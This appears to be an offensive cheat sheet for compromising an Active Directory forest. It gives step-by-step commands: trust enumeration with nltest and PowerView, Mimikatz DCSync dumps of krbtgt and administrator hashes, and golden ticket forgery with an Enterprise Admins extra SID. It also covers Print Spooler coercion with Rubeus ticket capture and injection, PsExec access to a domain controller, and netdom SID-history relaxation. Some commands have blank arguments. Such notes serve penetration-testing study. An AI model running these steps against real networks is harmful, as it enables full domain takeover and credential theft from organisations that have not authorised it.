Pwning a AD Forest
Forest Enumeration
#Check for trusted domains with NLTest
nltest /trusted_domains
#Check for trusted domains with PowerShell & .NET
#Check for trusted domains with PowerView
Get-DomainTrust -API
#Check for trusted domains with LDAP
Enumerate users and objects in different domains of the forest
#PowerView (using the -Domain flag)
Get-DomainUser -Domain
Get NTLM Hash of trusted domain (query domain computeraccount) with MimiKatz
lsadump::dcsync / /user:corp1$
Create Golden Ticket for Enterprise Admins to be admin in every domain with MimiKatz (adding extra SID)
#Get NTLM hash of current domain KRBTGT account:
lsadump::dcsync / /user:prod\krbtgt
#We need the domain SID's for the current domain and the target domain. We use Get-DomainSID from PowerView:
Get-DomainSID -Domain
Get-DomainSid -Domain
#We need the RID of the Enterprise Admins group. This is a static value of 519 and we will append this to the SID.
#Craft the Golden Ticket that will grant us Enterprise Admin membership in /sid is current domain and /sids is target domain + RID of 519:
kerberos::golden /user:%USERNAME% / /sid:S-1-5-21-3776646582-
2086779273-4091361643 /krbtgt:4b6af2bf64714682eeef64f516a08949 /sids:S-1-5-21-
1095350385-1831131555-2412080359-519 /ptt
#Access domain controller in new domain with PSExec:
c:\tools\SysinternalsSuite\PsExec.exe \\rdc01 cmd
Use Print Spooler bug to own forest
*This technique does not require Domain Admin privileges. However, if we have Domain Admin privileges and no servers with unconstrained delegation exist in our current domain, we can create one ourselves by modifying the configuration of one of the servers.
#Let's try to access the print spooler in another domain (this is a requirement):
ls \\rdc01\pipe\spoolss
#From and administrative prompt use Rubeus to monitor for new tickets from the root domain controller machine account
Rubeus.exe monitor /interval:5 /filteruser:RDC01$
#Launch the SpoolSample attack to the remote domain to force the print change notification from rdc01:
#A new forwardable TGT is received in Rubeus. We can use Rubeus to inject it into memory:
Rubeus.exe ptt /ticket:%TICKETNAME%
#Perform replication with MimiKatz to get the NTLM hash of the remote administrator:
lsadump::dcsync / /user:corp1\administrator
Get Forests Trusts between multiple forests
#PowerView (if selective authentication is not enabled):
Get-DomainTrust -Domain
#PowerView - Get ForestTrusts
#Powerview - Get all mappings
Forest User Enumeration
Get users in another forest
Get-DomainUser -Domain
Get Users from current domain that are a groupmember in another forest
Get-DomainForeignGroupMember -Domain
Get members of a specific group in another trusted domain
#Enumerater members of the remote forest built-in Administrator's group (PowerView):
Get-DomainGroupMember -Identity "Administrators" -Domain
Get the SID of a domain:
Get-DomainSID -domain
Use NetDom to relax SID History between and (other forest)
*Note - SID filtering will still be active. Microsoft dictated that any SID with a RID less than 1000 will always be filtered regardless of the SID history setting. And if the custom group we attempt to abuse is a member a global security group like Domain Admins or Enterprise Admins, that access will also be filtered. Only group membership in domain local security groups is not filtered. The built-in Administrators group is a domain local group.
#Perform this as a administrator
netdom trust %Source-Domain% /d:%Target-Domain% /enablesidhistory:yes
netdom trust / /enablesidhistory:yes
#Check if setting is changed (look for "TREAT_AS_EXTERNAL" on target domain)
Get-DomainTrust -Domain
*RID less than 1000 will always be filtered regardless of the SID history setting. A non-default group will always have a RID equal to or higher than 1000. If we can find a custom group whose membership will allow us to compromise a user or computer, we can use that as an entry point. Another important thing to note is that when the custom group we attempt to abuse is a member a global security group like Domain Admins or Enterprise Admins, that access will also be filtered. Only group membership in domain local security groups is not filtered.
So enumerate for instance the domain local “Administrators” group (Get-DomainGroupMember -Identity “Administrators” -Domain on the target domain to check for custom groups that are member.